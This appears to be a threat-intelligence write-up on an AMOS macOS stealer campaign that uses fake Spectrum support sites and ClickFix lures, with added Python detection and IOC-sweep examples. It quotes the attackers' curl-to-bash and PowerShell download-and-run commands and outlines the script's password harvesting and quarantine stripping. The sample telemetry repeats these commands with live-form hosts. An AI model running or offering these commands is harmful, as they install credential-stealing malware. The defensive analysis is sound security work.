Security researchers have uncovered a new campaign leveraging a variant of the Atomic macOS Stealer (AMOS), deploying a sophisticated blend of phishing and technical exploitation to target both consumer and corporate macOS users.
The campaign, first detected in early June 2025, uses typosquatted domains mimicking the U.S. telecom provider Spectrum and exploits the Clickfix method, a known social engineering tactic, to deliver OS-specific payloads.


Technical Analysis: Multi-Platform Payloads and Native Abuse
The attackers set up fake Spectrum-themed websites, such as panel-spectrum[.]net and spectrum-ticket[.]net, to lure victims searching for legitimate customer support portals.
Upon visiting these sites, users are prompted to verify their identity via an “Alternative Verification” process.
Victims see a button that, when clicked, copies a command to their clipboard and displays instructions tailored to their detected operating system:
For macOS Users:

```bash
/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)"
```

- `curl -fsSL <URL>` downloads a script silently and follows redirects.
- The script is executed immediately within Bash.
install.sh – Malicious Shell Script Breakdown:
- Password Harvesting:
  - Retrieves the current user’s name: `username=$(whoami)`.
  - Prompts for the “System Password” in a loop.
  - Validates the password using `dscl . -authonly`.
  - Stores the captured password in `/tmp/.pass`.
- Payload Download & Execution:
  - Downloads the actual AMOS binary: `curl -o /tmp/update https://applemacios[.]com/getrur/update`.
  - Removes macOS quarantine (using the stolen password): `sudo -S xattr -c /tmp/update`.
  - Makes the binary executable: `chmod +x /tmp/update`.
  - Executes the malicious binary: `/tmp/update`.
Key Security Evasion Tactics:
- Abuse of native macOS utilities (`dscl`, `sudo`, `xattr`).
- Immediate execution of downloaded binaries, helping bypass traditional antivirus and Endpoint Detection and Response (EDR) solutions.
- Use of legitimate-looking prompts and instructions to lower suspicion.
For Windows and Linux Users:
- The delivery site serves PowerShell or incorrect instructions (e.g., “Hold Windows Key + R” shown to all users), indicating haste in infrastructure setup.

```powershell
powershell -NoProfile -ExecutionPolicy Bypass -Command "$file = [System.IO.Path]::Combine($env:TEMP, 'api.ps1'); Invoke-WebRequest -Uri 'https://cf-verifi[.]pages[.]dev/i.txt' -OutFile $file; & $file"
```
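The command chains above (curl fed straight into a shell, repeated `dscl . -authonly` attempts, quarantine stripped from a file under `/tmp`, a binary run from `/tmp`, and the PowerShell download-and-invoke variant) are each individually rare in normal use and, together, a strong signal. The following is an added example, not code from the article or from any vendor, of behavioural rules run over constructed process telemetry; the record format (`pid|ppid|user|image|cmdline`), the rule names, and the sample events are all assumptions made for this illustration, with the malicious records modelled on the commands quoted in the write-up.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    user: str
    image: str
    cmdline: str


# Constructed process telemetry for this example ("pid|ppid|user|image|cmdline"),
# not output from any real sensor. The jdoe and asmith records mirror the
# macOS and Windows command chains described in the write-up; the admin
# records are routine activity that must not fire. Passwords are redacted.
SAMPLE_EVENTS = """\
400|1|jdoe|/bin/zsh|-zsh
401|400|jdoe|/usr/bin/curl|curl -fsSL https://applemacios.com/getrur/install.sh
402|400|jdoe|/bin/bash|/bin/bash -c "$(curl -fsSL https://applemacios.com/getrur/install.sh)"
403|402|jdoe|/usr/bin/dscl|dscl . -authonly jdoe <redacted>
404|402|jdoe|/usr/bin/dscl|dscl . -authonly jdoe <redacted>
405|402|jdoe|/usr/bin/dscl|dscl . -authonly jdoe <redacted>
406|402|jdoe|/usr/bin/curl|curl -o /tmp/update https://applemacios.com/getrur/update
407|402|jdoe|/usr/bin/sudo|sudo -S xattr -c /tmp/update
408|402|jdoe|/bin/chmod|chmod +x /tmp/update
409|402|jdoe|/tmp/update|/tmp/update
601|1|asmith|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -NoProfile -ExecutionPolicy Bypass -Command "$file = [System.IO.Path]::Combine($env:TEMP, 'api.ps1'); Invoke-WebRequest -Uri 'https://cf-verifi.pages.dev/i.txt' -OutFile $file; & $file"
501|1|admin|/usr/bin/curl|curl -fsSL https://example.org/release-notes.txt -o notes.txt
502|1|admin|/usr/bin/xattr|xattr -l /Users/admin/Downloads/report.pdf
503|1|admin|/usr/bin/dscl|dscl . -read /Users/admin UniqueID
"""


def parse_events(text: str) -> list[ProcEvent]:
    """Parse the constructed records; maxsplit keeps '|' inside command lines intact."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, ppid, user, image, cmdline = line.split("|", 4)
        events.append(ProcEvent(int(pid), int(ppid), user, image, cmdline))
    return events


# Stage 1: a shell executing whatever curl fetched, via command substitution
# ("bash -c $(curl ...)") or a pipe ("curl ... | bash").
CURL_TO_SHELL = re.compile(
    r"(?:ba|z)?sh\s+-c\s+.*\$\(\s*curl\b"
    r"|curl\b[^|]*\|\s*(?:/bin/)?(?:ba|z)?sh\b"
)
# Stage 2: local password validation; counted per parent process below.
DSCL_AUTHONLY = re.compile(r"\bdscl\s+\.\s+-authonly\b")
# Stage 3: quarantine attribute cleared from a file in a temp directory.
QUARANTINE_STRIP = re.compile(
    r"\bxattr\s+(?:-c|-d\s+com\.apple\.quarantine)\s+(?:/private)?/tmp/"
)
# Stage 4: the executed image itself lives under /tmp.
TMP_IMAGE = re.compile(r"^(?:/private)?/tmp/")
# Windows variant: policy bypass, download to a variable-named file, then
# invocation of that same variable.
PS_DOWNLOAD_EXEC = re.compile(
    r"powershell.*-ExecutionPolicy\s+Bypass.*Invoke-WebRequest.*-OutFile\s+(\$\w+).*&\s*\1",
    re.IGNORECASE,
)


def rules_for_event(ev: ProcEvent) -> set[str]:
    """Stateless rules that fire on a single event."""
    hits = set()
    if CURL_TO_SHELL.search(ev.cmdline):
        hits.add("curl_piped_to_shell")
    if QUARANTINE_STRIP.search(ev.cmdline):
        hits.add("quarantine_stripped_in_tmp")
    if TMP_IMAGE.match(ev.image):
        hits.add("binary_executed_from_tmp")
    if PS_DOWNLOAD_EXEC.search(ev.cmdline):
        hits.add("powershell_download_and_run")
    return hits


def detect(events: list[ProcEvent], loop_threshold: int = 2) -> dict[str, set[str]]:
    """Map each user to the set of rule names their activity triggered.

    A single `dscl . -authonly` call is normal for some admin tooling, so that
    rule only fires once one parent process has driven `loop_threshold` or
    more attempts: the prompt-until-correct loop the script uses.
    """
    findings: dict[str, set[str]] = defaultdict(set)
    authonly_attempts: dict[tuple[str, int], int] = defaultdict(int)
    for ev in events:
        findings[ev.user] |= rules_for_event(ev)
        if DSCL_AUTHONLY.search(ev.cmdline):
            authonly_attempts[(ev.user, ev.ppid)] += 1
    for (user, _parent), count in authonly_attempts.items():
        if count >= loop_threshold:
            findings[user].add("dscl_authonly_loop")
    return {user: rules for user, rules in findings.items() if rules}


if __name__ == "__main__":
    for user, rules in sorted(detect(parse_events(SAMPLE_EVENTS)).items()):
        print(f"{user}: {', '.join(sorted(rules))}")
```

Each rule on its own is a lead, not a verdict; the value is in correlating them per user or per process tree, which is why the loop rule keys on the parent pid rather than on individual `dscl` events. Tune `loop_threshold` against your own baseline of legitimate `-authonly` use before alerting on it.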
Attribution, Indicators, and Infrastructure Flaws
Analysis of the campaign revealed Russian-language comments embedded in the delivery page source code, suggesting involvement of Russian-speaking cybercriminals.
The infrastructure is notably sloppy, with mismatched platform instructions and shared commands for disparate operating systems, a tactic that may undermine the campaign’s stealth but enables rapid, wide deployment.
Key Indicators of Compromise (IOCs):
| Indicator Type | Value |
|---|---|
| Domains | panel-spectrum[.]net, spectrum-ticket[.]net, applemacios[.]com, cf-verifi.pages[.]dev |
| MD5 (AMOS binary) | eaedee8fc9fe336bcde021bf243e332a |
| URLs | https://applemacios[.]com/getrur/install.sh, https://applemacios[.]com/getrur/update |
| File Path | /tmp/update |
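The IOCs in the table are published defanged (`[.]`), so they have to be normalised before they can be compared with anything a DNS resolver, proxy or file-integrity sensor actually logs, and domain IOCs should match subdomains as well as the bare name. The following is an added example, not code from the article, that refangs the table above and sweeps it over constructed log lines; the log format (`timestamp source key=value ...`), the client addresses and the benign entries are assumptions made for this illustration.

```python
from dataclasses import dataclass
from urllib.parse import urlsplit

# IOC values copied from the table above, still in defanged form.
IOCS = {
    "domain": [
        "panel-spectrum[.]net",
        "spectrum-ticket[.]net",
        "applemacios[.]com",
        "cf-verifi.pages[.]dev",
    ],
    "url": [
        "https://applemacios[.]com/getrur/install.sh",
        "https://applemacios[.]com/getrur/update",
    ],
    "md5": ["eaedee8fc9fe336bcde021bf243e332a"],
    "path": ["/tmp/update"],
}

# Constructed log lines for this example, not real telemetry. Client
# 10.0.0.21 replays the infection chain; 10.0.0.35 visits the legitimate
# provider and must produce no hits.
SAMPLE_LOGS = """\
2025-06-03T10:14:02Z dns client=10.0.0.21 query=panel-spectrum.net type=A
2025-06-03T10:14:40Z proxy client=10.0.0.21 url=https://applemacios.com/getrur/install.sh status=200
2025-06-03T10:15:01Z proxy client=10.0.0.21 url=https://www.applemacios.com/getrur/update status=200
2025-06-03T10:15:09Z file client=10.0.0.21 path=/tmp/update md5=EAEDEE8FC9FE336BCDE021BF243E332A
2025-06-03T10:20:00Z dns client=10.0.0.35 query=spectrum.net type=A
2025-06-03T10:21:00Z proxy client=10.0.0.35 url=https://www.spectrum.net/support status=200
"""


def refang(value: str) -> str:
    """Undo the common defanging conventions used in published IOC lists."""
    return (
        value.replace("[.]", ".")
        .replace("hxxps://", "https://")
        .replace("hxxp://", "http://")
    )


# Normalised once, lowercased so comparisons are case-insensitive.
REFANGED = {kind: [refang(v).lower() for v in values] for kind, values in IOCS.items()}


def host_matches(host: str, ioc_domain: str) -> bool:
    """True for the IOC domain itself or any subdomain of it."""
    return host == ioc_domain or host.endswith("." + ioc_domain)


@dataclass(frozen=True)
class Hit:
    timestamp: str
    client: str
    kind: str
    value: str


def parse_line(line: str) -> tuple[str, str, dict[str, str]]:
    """Split 'timestamp source key=value ...' into its parts."""
    parts = line.split()
    fields = dict(p.split("=", 1) for p in parts[2:] if "=" in p)
    return parts[0], parts[1], fields


def scan_logs(text: str) -> list[Hit]:
    """Return every IOC match found in the log text, one Hit per IOC per line."""
    hits: list[Hit] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, source, f = parse_line(line)
        client = f.get("client", "?")
        if source == "dns":
            query = f.get("query", "").lower().rstrip(".")
            for d in REFANGED["domain"]:
                if host_matches(query, d):
                    hits.append(Hit(ts, client, "domain", d))
        elif source == "proxy":
            url = f.get("url", "")
            host = (urlsplit(url).hostname or "").lower()
            for d in REFANGED["domain"]:
                if host_matches(host, d):
                    hits.append(Hit(ts, client, "domain", d))
            if url.lower() in REFANGED["url"]:
                hits.append(Hit(ts, client, "url", url))
        elif source == "file":
            md5 = f.get("md5", "").lower()
            if md5 in REFANGED["md5"]:
                hits.append(Hit(ts, client, "md5", md5))
            path = f.get("path", "")
            if path.lower() in REFANGED["path"]:
                hits.append(Hit(ts, client, "path", path))
    return hits


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(f"{hit.timestamp} {hit.client} {hit.kind}={hit.value}")
```

Hash and exact-URL matches are the weakest part of such a sweep, since a rebuilt binary or a renamed script path defeats them; the domain and `/tmp/update` matches survive those changes, which is why the scan reports every kind of hit separately rather than collapsing them into one verdict.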
Impact and Mitigation Guidance
Risks to Organizations
- Credential Theft: Stolen macOS system passwords can be used to compromise enterprise VPNs, cloud accounts, and internal systems.
- Bypass of Security Tools: By abusing system commands and legitimate utilities, detection is significantly hindered.
- Potential for Lateral Movement and Ransomware: Credentials and persistent access pave the way for deeper intrusions, data theft, or ransomware deployment.
Defensive Best Practices
- User Awareness: Train staff to recognize social engineering, especially bogus “system verification” prompts.
- Endpoint Hardening: Enforce Gatekeeper, disallow unsigned scripts, and use Mobile Device Management (MDM) to lock down macOS systems.
- Threat Hunting: Actively monitor for suspicious password prompt loops, misuse of `dscl`, and known AMOS IOCs.
- Incident Response: Isolate affected endpoints and reset compromised credentials immediately.
The AMOS stealer’s use of Clickfix, native macOS commands, and hastily assembled typosquatting infrastructure highlights the escalating sophistication and opportunism in multi-platform social engineering.
Vigilant user education and proactive technical controls are vital to staying ahead of these fast-moving threats.